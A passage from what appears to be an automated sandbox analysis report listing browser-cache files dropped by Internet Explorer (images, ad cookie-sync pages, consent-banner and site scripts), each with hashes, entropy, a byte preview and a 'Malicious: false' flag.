Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...W..X...P@..K+i`.k.z..JlH.E.<..,.w.!9.J1...Z.........vF1....gj..m........^.....?;.p(hI..w..az.Lh...g.cc....$...1..P@......T....X.:..[E.H.rG..t..%....DO....c..c......L..LC6.g.....?}..PC.....:.a..".[4e.<9...D.....w........T5..mO.:.. N....z.-..V.m.l.....4.ybI...[..H.....4.F....#....P....+..vQ..T.:9....h.j%.F2......!.l.....P.....r\,r.....XAX..;O.&..G>.ZV....1R.r(..i.4..)

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAPaldW[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
Category:	dropped
Size (bytes):	6119
Entropy (8bit):	7.784668519065917
Encrypted:	false
SSDEEP:	96:QfQENXqaS/ZtChQjS60jP4bmYF5dYpcoYSCKXl6y+NA5M3MS5c1ImCd7CtxFBZUe:QogXVS/PMQjGe7/WPcC412qP4txvZUfG
MD5:	EE406C40CE6EB0ACE1FC06BB1EAE744A
SHA1:	BD24629A4AD1DF2ADE70A00FF8C23176AD63D5F6
SHA-256:	F35666C1C5790DCD4B2396C6D01CA83CA2EB68EBAF4F26222D1E910FC6EAD1CE
SHA-512:	98B96D9CC68CC33748A0C10A2CA9A3B964F9B5833812099127186526F1C4E7533383E875FE4240365800DD74A5EBF1DF7DE77C9DFC68A4703EA77C22798ED79F
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..sT!A..R.(.s@...qJCD..:..L.)...@.h.....x....p...L.~VZ...d.[?...T.E.bZ:$m.....$....\z..tgh.).h..3.!.t5-.1....7.Z@....!a.@...@...@..o...>.=h...=............Z.n#-.qR...QP.:....[.`D....T.w.`D.-.9%....M=DtP...9.V..Ku...i.1.?.Kin5..)K.K >JyK.,..u{.F..EbIy\|.,.rq.JM.*.J......`U#&s.z..X.A..$o....7..!.j.C\|...j....g........0%...(....@..Dy..b...4..C..Hc. ....1..@...W..(............

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAPaqLI[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
Category:	dropped
Size (bytes):	2332
Entropy (8bit):	7.804305344516817
Encrypted:	false
SSDEEP:	24:QI/OtlM0XxDuLHeOWXG427DAJuLHenX3dtHY44lZZvjaToaIwaNKBGGU71L6ve0S:QfAuETAV4XvjtSIMiBjyiSAdx9dFhw4
MD5:	8F3FB279A342E21D473EF1E314A04A57
SHA1:	104F18CD83DE1DE6DF57462CDED9A245F97202AB
SHA-256:	BA60350C406B8698C73709FD0D9A061F18AD049AA2BE17345A23B56BEA389B6D
SHA-512:	1B1596AB0B677824F82B75708F34F281F889D6BE21CBDA292976FDB99E3E46E21A987CB21FE27697319FA81647561B7490DD42C8EE80A3D6219480D80C7E377A
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....Qi7.!2.......H.,4..t.'...G..;...UC....?....R...Y..H.9.T.j=..E<..1..v8.x..; h\|M:.<..\|.Msb.~...7e...V1.M...#s.../.\T3.v.GS.)..\h..[.~.....p.F...0H.Nh.^.d.".........,.I.y.'..u......ZC2..J...n.7..B....\L.z....$..t.$.E!Nz....y.._'<..Z.r.....lr..,..>..E....Cw..ER.0s.je.r...\|....0..1.m.....Wr..m..C...7...p;.].{.v.l....,.%...$.........;jl.?....O?1.%....<t.k...a*in.....b.....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\AAPatbE[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	dropped
Size (bytes):	14836
Entropy (8bit):	7.385116017861641
Encrypted:	false
SSDEEP:	192:Qnuf1h2EzAfTSRtavnTFYBW/3epwN6qGP4j/+CXDNuGGd96LujZe4VjJZ18k7G5:IufmEzAgKFYg/3epwiAX5/G8wC5
MD5:	34452E3D2D8D9CB813B632E5C46BA44E
SHA1:	7E7FCDAFAD1C28EC7A20BEE260916CE833C9AE60
SHA-256:	397372C30640074DB04805A098E40C733774E754D676638DF60D856CEB7F3D55
SHA-512:	FF9E6116739F369DCCC69630DFC6E47F9701618B46C2F22EE283713D0CB018B15968F4C0C02D5C8651CD049F9328EC780B9CCAD775F604BC7D3138846D732606
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.hA..<...@s.H...c...(.P..@.....($...A@.@........).M.P.o=..w.....&..2M..h.qL.....=..@4..4..4.1@.(...Q@.@.h..j.9.........@..P..E.\.@.h........f...L{..Q......y............v.sH..0...d...4.......R...q.H..`..P..`..'.......3@.M.6...i.4...;v."..3....0.2{.....RH.P..oJb.{..(..h..\.. <S.h.q@....@..H.'4..i.....>.......vh......@.94.Z.8.@...@...(.h.s..3.@.h......- .P...h...-....n..w. ...2h.s@..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BB15AQNm[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
Category:	dropped
Size (bytes):	29565
Entropy (8bit):	7.9235998300887145
Encrypted:	false
SSDEEP:	384:I1cMsjB7+C2bbAEB2SUZRT+kXoMRRJhp5xvHapIzf7m41tgaYi9PIVKnHNVMP2Nm:IHsjkC2YEB2SUPTT48FPHTgf3VKn2Uc
MD5:	6B79D1438D8EFAF3B8DE6163107CEC71
SHA1:	E54E651A8A0FDAFCAD60B137D806D8CEC2F769C0
SHA-256:	2F00C9B0C23EE995091A90ACC7A8FA3AA773612A464F558D78664636C8B7B8D8
SHA-512:	745B822F9E21DB98B909F3AE762C439C376A35AD5C08655861B05539ACD5C47BCDCF24FAB2FB5A56712BC3BEDE6493FD5152E92D065AC5E9ECCE2DF93C4B78B7
Malicious:	false
Preview:	......JFIF.....`.`...................... .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n...........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(...4.m.!....4..i..4..l.C..u .pi....dRe#J..\..t..bC3.)..l.".W.#..&.....-&2.".&.(l..y...r...cE.7..h(#......t..E.....H.^b..../...5 ..r..4&R.>F.. ~..$..R.....1..WDV.L..j.^q..!...T.+..x.$.+._..<{Tc4!.^\$q.ZR`q...Y........A.Ld...(HM.....Z#2b.u40 ...J.F.j.*...Fy.."h..g.&...+H..$2...A....N.c.L...^..c...<Qa..[.. -..v.....-....xg.K.e+..'5[.... !@.ZM.b."....<.........~....(..".~

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BB1cEP3G[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1088
Entropy (8bit):	7.81915680849984
Encrypted:	false
SSDEEP:	24:FCGPRm4XxHvhNBb6W3bc763IU6+peaq90IUkiRPfoc:/pXBvkW3bc7k1FqWIUkSfB
MD5:	24F1589A12D948B741C2E5A0C4F19C2A
SHA1:	DC9BB00C5D063F25216CDABB77F5F01EA9F88325
SHA-256:	619910A3140A45391D7D3CB50EC4B48F0B0C8A76DC029576127648C4BD4B128C
SHA-512:	5D7A17B05E1FD1BC02823EC2719D30BC27A9FA03BCFFE30F3419990E440845842F18797C9071C037417776641AB2CDB86F1F6CD790D70481B3F863451D3249EE
Malicious:	false
Preview:	.PNG........IHDR................U....pHYs..........+......IDATx...]..U.....d..6YwW(.UV\.v.>.>..`.K}X).i..Tj...C..RD. ..AEXP.............]).vQ../$.%.l2.....dH&.YiOr93.....~..u.S...5........J.&..;.JN..z....2..;q.4..I .....c!....2;J........l(......?.m+......V...g3.0..............C..GB.$..M.....jl.M..~6?.........../a%...;....E.by.J..1.$...".&.DX..W..jh.....=...aK...[.#....].. ....:Q....X.........uk.6.0...e7..RZ..@@H..k........#......[..C.-.AbC.fK.(a.<.^p.j`...._>{<....`.........%.L...q.G...).2oc{....vQ...N5..%m-ky19..F.S....&..../..F......y.(.8.1..>?Zr......Q.`.e.\|0.&m.E....=[aN..r.+....2B/f8.v..n...N..=........i.^....s&..Hr.z.....M......:........EF.....0.. .N.x............N.pO.#2...df=...Fa..B#2yU....O.;.g....b.}ct.&.7x..t.Y..yg....]..){.,.v.F.e.ZF.z..Ur+..^..].#.]....~..}..{g.W0?....&....6n....p\.=.]..X...F.]...\s5OK.3Wb.#.M/fT...:^.M}...:t.......!..g......0t.h..8..4cB....px..............1.!...}=...Qb$W.*..."............V....!.y......<H

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BB6Ma4a[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	368
Entropy (8bit):	6.811857078347448
Encrypted:	false
SSDEEP:	6:6v/lhPahm7HmoUvP34NS7QRdujbt1S+bQkW1oFjTZLKrdmhtIargWoaf90736wDm:6v/7xkHA2QRdsbt1pBcrshtvgWoaO7qZ
MD5:	C144BE9E6D1FA9A7DB6BD090D23F3453
SHA1:	203335FA5AD5E9D98771E6EA448E02EE5C0D91F3
SHA-256:	FAC240D4CA688818C08A72C363168DC9B73CFED7B8858172F7AD994450A8D459
SHA-512:	67B572743A917A651BD05D2C9DCEC20712FD9E802EC6C1A3D8E61385EB2FEBB1F19248F16E906AF0B62111B16C0EA05769AEA1C44D81A02427C1150CB035EA78
Malicious:	false
Preview:	.PNG........IHDR................a....pHYs..........+....."IDATx.cy. ..?...\|.UA....GX...43.!:.o(f..Oa`..C...+Z0.y......~..0...>.....(....X3H.....Y....zQ4.s0....R.u.t..\|....)....(.$.`..a...d.qd.....3...W_...}....;.........4.....>....N....)d........p.4......`i.k@QE....j....B....X.7....\|..0.....pu?.1B,...J..P.......`F.>R..2.l.(..3J#.L4...9[...N....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BBVuddh[2].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	316
Entropy (8bit):	6.917866057386609
Encrypted:	false
SSDEEP:	6:6v/lhPahmxj1eqc1Q1rHZI8lsCkp3yBPn3OhM8TD+8lzjpxVYSmO23KuZDp:6v/7j1Q1Q1ZI8lsfp36+hBTD+8pjpxy/
MD5:	636BACD8AA35BA805314755511D4CE04
SHA1:	9BB424A02481910CE3EE30ABDA54304D90D51CA9
SHA-256:	157ED39615FC4B4BDB7E0D2CC541B3E0813A9C539D6615DB97420105AA6658E3
SHA-512:	7E5F09D34EFBFCB331EE1ED201E2DB4E1B00FD11FC43BCB987107C08FA016FD7944341A994AA6918A650CEAFE13644F827C46E403F1F5D83B6820755BF1A4C13
Malicious:	false
Preview:	.PNG........IHDR................a....pHYs..........+......IDATx....P..?E....U..E..\|......\|...M.XD.`4YD...{.\6....s..0.;....?..&.../. ......$.\|Y....UU)gj...]..;x..(.."..$I.(.\.E.......4....y.....c...m.m.P...Fc...e.0.TUE....V.5..8..4..i.8.}.C0M.Y..w^G..t.e.l..0.h.6.\|.Q...Q..i~.\|...._...'..Q...".....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BBY7ARN[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	779
Entropy (8bit):	7.670456272038463
Encrypted:	false
SSDEEP:	24:dYsfeTaIfpVFdpxXMyN2fFIKdko2boYfm:Jf5ILpCyN29lC5boD
MD5:	30801A14BDC1842F543DA129067EA9D8
SHA1:	1900A9E6E1FA79FE3DF5EC8B77A6A24BD9F5FD7F
SHA-256:	70BB586490198437FFE06C1F44700A2171290B4D2F2F5B6F3E5037EAEBC968A4
SHA-512:	8B146404DE0C8E08796C4A6C46DF8315F7335BC896AF11EE30ABFB080E564ED354D0B70AEDE7AF793A2684A319197A472F05A44E2B5C892F117B40F3AF938617
Malicious:	false
Preview:	.PNG........IHDR................a....pHYs..........+......IDATx.eSMHTQ...7.o.8#3.0....M.BPJDi...E..h.A...6..0.Z$..i.A...B....H0.rl..F.y:?...9O..^......=.J..h..M]f>.I...d...V.D..@....T..5`......@..PK.t6....#,.....o&.U.lJ @...4S.J$..&......%v.B.w.Fc......'B...7...B..0..#z..J..>r.F.Ch..(.U&.\..O.s+..,]Z..w..s.>.I_.......U$D..CP.<....].\w..4..~...Q....._...h...L......X.{i... {..&.w.:.....$.W.....W..."..S.pu..').=2.C#X..D.........}.$..H.F}.f...8...s..:.....2..S.LL..'&.g.....j.#....oH..EhG'...`.p..Ei...D...T.fP.m3.CwD).q.........x....?..+..2....wPyW...j........$..1........!Wu*e"..Q.N#.q..kg...%`w.-.o..z..CO.k.....&..g..@{..k.J._...)X..4)x...ra.#....i._1...f..j...2..&.J.^. .@$.`0N.t.......D.....iL...d/.\|Or.L._...;a..Y.]i.._J....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\a5ea21[1].ico Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	758
Entropy (8bit):	7.432323547387593
Encrypted:	false
SSDEEP:	12:6v/792/6TCfasyRmQ/iyzH48qyNkWCj7ev50C5qABOTo+CGB++yg43qX4b9uTmMI:F/6easyD/iCHLSWWqyCoTTdTc+yhaX4v
MD5:	84CC977D0EB148166481B01D8418E375
SHA1:	00E2461BCD67D7BA511DB230415000AEFBD30D2D
SHA-256:	BBF8DA37D92138CC08FFEEC8E3379C334988D5AE99F4415579999BFBBB57A66C
SHA-512:	F47A507077F9173FB07EC200C2677BA5F783D645BE100F12EFE71F701A74272A98E853C4FAB63740D685853935D545730992D0004C9D2FE8E1965445CAB509C3
Malicious:	false
Preview:	.PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D..M..............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q\|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq\|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\checksync[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	27135
Entropy (8bit):	5.33237304261757
Encrypted:	false
SSDEEP:	384:pBNY7cAGcVXlblcqnzleZS57naMh6eg2f5ng1h7/V99qQWwY4RXrqt:p/r86qhbc2Rsh7/V/qQWwY4RXrqt
MD5:	2C50DB6096770441093C246D675D2E89
SHA1:	67C562A49E8C20A9C184FB158111B3DD4C3BD8FF
SHA-256:	303267EF7E63A88E2D2F0856D259E796F2ED213D3DB4D4B5240B11915C6EEE4F
SHA-512:	4B9F81C3995875D252D26FE69E6E60C649A52BA06734E693A1C90AD72F62987F44651B3F52878D4BC45ED8F342B5C160B527BDA0741539A3ED0BD0B2E3E9ED91
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":82,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"ZA","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","time":14,"cookie":"data-g","urls":[{"type":"img","url":"https:\/\/cm.g.doubleclick.net\/pixel?cs=1&google_nid=media&google_cm=1&google_hm=<encb64vsid>&google_sc=1"}],"pvid":77,"isBl":0,"g":1,"cocs":0},"bs":{"name":"bs","time":364,"cookie":"data-bs","urls":[{"type":"img","url":"https:\/\/x.bidswitch.net\/sync?ssp=medianet&gdpr=${GDPR}&gdpr_consent=${GDPR_CONSENT}&gdpr_pd=1"}],"pvid":109,"isBl":0,"g":1,"cocs":0},"vzn":{"name":"vzn","time":365,"cookie":"data-v","urls":[{"type":"img","url":"https:\/\/contextual.media.net\/cksync.php?cs=1&type=vzn&ovsid={{APID}}&redirect=https%3A%2F%2Fpixel.advertising.com%2Fups%2F58222%2Fsync%3F_origin%3D1%26uid%3D%24UID"}],"pvid":184,"isBl":0,"g":0,"cocs":0},"brx":{"name":"brx","time":365,"cook

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\checksync[2].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	27135
Entropy (8bit):	5.33237304261757
Encrypted:	false
SSDEEP:	384:pBNY7cAGcVXlblcqnzleZS57naMh6eg2f5ng1h7/V99qQWwY4RXrqt:p/r86qhbc2Rsh7/V/qQWwY4RXrqt
MD5:	2C50DB6096770441093C246D675D2E89
SHA1:	67C562A49E8C20A9C184FB158111B3DD4C3BD8FF
SHA-256:	303267EF7E63A88E2D2F0856D259E796F2ED213D3DB4D4B5240B11915C6EEE4F
SHA-512:	4B9F81C3995875D252D26FE69E6E60C649A52BA06734E693A1C90AD72F62987F44651B3F52878D4BC45ED8F342B5C160B527BDA0741539A3ED0BD0B2E3E9ED91
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":82,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"ZA","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","time":14,"cookie":"data-g","urls":[{"type":"img","url":"https:\/\/cm.g.doubleclick.net\/pixel?cs=1&google_nid=media&google_cm=1&google_hm=<encb64vsid>&google_sc=1"}],"pvid":77,"isBl":0,"g":1,"cocs":0},"bs":{"name":"bs","time":364,"cookie":"data-bs","urls":[{"type":"img","url":"https:\/\/x.bidswitch.net\/sync?ssp=medianet&gdpr=${GDPR}&gdpr_consent=${GDPR_CONSENT}&gdpr_pd=1"}],"pvid":109,"isBl":0,"g":1,"cocs":0},"vzn":{"name":"vzn","time":365,"cookie":"data-v","urls":[{"type":"img","url":"https:\/\/contextual.media.net\/cksync.php?cs=1&type=vzn&ovsid={{APID}}&redirect=https%3A%2F%2Fpixel.advertising.com%2Fups%2F58222%2Fsync%3F_origin%3D1%26uid%3D%24UID"}],"pvid":184,"isBl":0,"g":0,"cocs":0},"brx":{"name":"brx","time":365,"cook

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\checksync[3].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	27135
Entropy (8bit):	5.33237304261757
Encrypted:	false
SSDEEP:	384:pBNY7cAGcVXlblcqnzleZS57naMh6eg2f5ng1h7/V99qQWwY4RXrqt:p/r86qhbc2Rsh7/V/qQWwY4RXrqt
MD5:	2C50DB6096770441093C246D675D2E89
SHA1:	67C562A49E8C20A9C184FB158111B3DD4C3BD8FF
SHA-256:	303267EF7E63A88E2D2F0856D259E796F2ED213D3DB4D4B5240B11915C6EEE4F
SHA-512:	4B9F81C3995875D252D26FE69E6E60C649A52BA06734E693A1C90AD72F62987F44651B3F52878D4BC45ED8F342B5C160B527BDA0741539A3ED0BD0B2E3E9ED91
Malicious:	false
Preview:	<html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":82,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"\|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"ZA","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","time":14,"cookie":"data-g","urls":[{"type":"img","url":"https:\/\/cm.g.doubleclick.net\/pixel?cs=1&google_nid=media&google_cm=1&google_hm=<encb64vsid>&google_sc=1"}],"pvid":77,"isBl":0,"g":1,"cocs":0},"bs":{"name":"bs","time":364,"cookie":"data-bs","urls":[{"type":"img","url":"https:\/\/x.bidswitch.net\/sync?ssp=medianet&gdpr=${GDPR}&gdpr_consent=${GDPR_CONSENT}&gdpr_pd=1"}],"pvid":109,"isBl":0,"g":1,"cocs":0},"vzn":{"name":"vzn","time":365,"cookie":"data-v","urls":[{"type":"img","url":"https:\/\/contextual.media.net\/cksync.php?cs=1&type=vzn&ovsid={{APID}}&redirect=https%3A%2F%2Fpixel.advertising.com%2Fups%2F58222%2Fsync%3F_origin%3D1%26uid%3D%24UID"}],"pvid":184,"isBl":0,"g":0,"cocs":0},"brx":{"name":"brx","time":365,"cook

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\e151e5[1].gif Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	GIF image data, version 89a, 1 x 1
Category:	dropped
Size (bytes):	43
Entropy (8bit):	3.122191481864228
Encrypted:	false
SSDEEP:	3:CUTxls/1h/:7lU/
MD5:	F8614595FBA50D96389708A4135776E4
SHA1:	D456164972B508172CEE9D1CC06D1EA35CA15C21
SHA-256:	7122DE322879A654121EA250AEAC94BD9993F914909F786C98988ADBD0A25D5D
SHA-512:	299A7712B27C726C681E42A8246F8116205133DBE15D549F8419049DF3FCFDAB143E9A29212A2615F73E31A1EF34D1F6CE0EC093ECEAD037083FA40A075819D2
Malicious:	false
Preview:	GIF89a.............!.......,...........D..;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\otBannerSdk[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	374818
Entropy (8bit):	5.338137698375348
Encrypted:	false
SSDEEP:	3072:axBt4stoUf3MiPnDxOFvxYyTcwY+OiHeNUQW2SzDZTpl1L:NUfbPnDxOFvxYyY+Oi+yQW2CDZTn1L
MD5:	2E5F92E8C8983AA13AA99F443965BB7D
SHA1:	D80209C734F458ABA811737C49E0A1EAF75F9BCA
SHA-256:	11D9CC951D602A168BD260809B0FA200D645409B6250BD8E8996882EBE3F5A9D
SHA-512:	A699BEC040B1089286F9F258343E012EC2466877CC3C9D3DFEF9D00591C88F976B44D9795E243C7804B62FDC431267E1117C2D42D4B73B7E879AEFB1256C644B
Malicious:	false
Preview:	/** .. * onetrust-banner-sdk.. * v6.13.0.. * by OneTrust LLC.. * Copyright 2021 .. */..!function(){"use strict";var o=function(e,t){return(o=Object.setPrototypeOf\|\|{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}\|\|function(e,t){for(var o in t)t.hasOwnProperty(o)&&(e[o]=t[o])})(e,t)};var r=function(){return(r=Object.assign\|\|function(e){for(var t,o=1,n=arguments.length;o<n;o++)for(var r in t=arguments[o])Object.prototype.hasOwnProperty.call(t,r)&&(e[r]=t[r]);return e}).apply(this,arguments)};function a(s,i,l,a){return new(l=l\|\|Promise)(function(e,t){function o(e){try{r(a.next(e))}catch(e){t(e)}}function n(e){try{r(a.throw(e))}catch(e){t(e)}}function r(t){t.done?e(t.value):new l(function(e){e(t.value)}).then(o,n)}r((a=a.apply(s,i\|\|[])).next())})}function d(o,n){var r,s,i,e,l={label:0,sent:function(){if(1&i[0])throw i[1];return i[1]},trys:[],ops:[]};return e={next:t(0),throw:t(1),return:t(2)},"function"==typeof Symbol&&(e[Symbol.iterator]=function(){return this}),e;function t(t

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\52-478955-68ddb2ab[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	397470
Entropy (8bit):	5.3243063622496525
Encrypted:	false
SSDEEP:	6144:YXP9M/wSg/Ms1J1Kb4K7hmnidHWPqIjHSja3Cr1BgxO0DkV4FcjtIuNK:CW/dcnidHWPqIjHdi16tbcjut
MD5:	9D766F4A32590647C9378BCE9B370BC3
SHA1:	D0328B82B0F75E3DC87A039D53A710D593E068CF
SHA-256:	950BB86AB57D21B1A8C2DFD51A355B4DD5C76C3A2CF557EE8A58B0DBC66FE2E4
SHA-512:	01CDE8BD19DAED5EFC41E429CC7AF5AB2BE6D2182B07781BADEE6F13615213E0A93C2E6CF34FE50BCC2702FA81ADEBA03C265B852DCDF603448B9E2406DF2C5C
Malicious:	false
Preview:	var awa,behaviorKey,Perf,globalLeft,Gemini,Telemetry,utils,data,MSANTracker,deferredCanary,g_ashsC,g_hsSetup,canary;window._perfMarker&&window._perfMarker("TimeToJsBundleExecutionStart");define("jqBehavior",["jquery","viewport"],function(n){return function(t,i,r){function u(n){var t=n.length;return t>1?function(){for(var i=0;i<t;i++)n[i]()}:t?n[0]:f}function f(){}if(typeof t!="function")throw"Behavior constructor must be a function";if(i&&typeof i!="object")throw"Defaults must be an object or null";if(r&&typeof r!="object")throw"Exclude must be an object or null";return r=r\|\|{},function(f,e,o){function c(n){n&&(typeof n.setup=="function"&&l.push(n.setup),typeof n.teardown=="function"&&a.push(n.teardown),typeof n.update=="function"&&v.push(n.update))}var h;if(o&&typeof o!="object")throw"Options must be an object or null";var s=n.extend(!0,{},i,o),l=[],a=[],v=[],y=!0;if(r.query){if(typeof f!="string")throw"Selector must be a string";c(t(f,s))}else h=n(f,e),r.each?c(t(h,s)):(y=h.length>0,

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\AAL6HKN[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	691
Entropy (8bit):	7.560413063685489
Encrypted:	false
SSDEEP:	12:6v/7eNFehYmADn6WBl8RNndp3uMlmxbApqWqSF5PGAQVSBYfyuo7:bezADn6WPEdflmx8hqUPKyuo7
MD5:	4588E3AF2AE96D0618AEBF48CAEC019C
SHA1:	9C6A25FECC38ECBFC207914D2D8B156E5ED1E57F
SHA-256:	296B1125352D5FDF7DB90EA1981D6A89C5E8C5EFC07CAE3B7CCDF5A0F4F11ACE
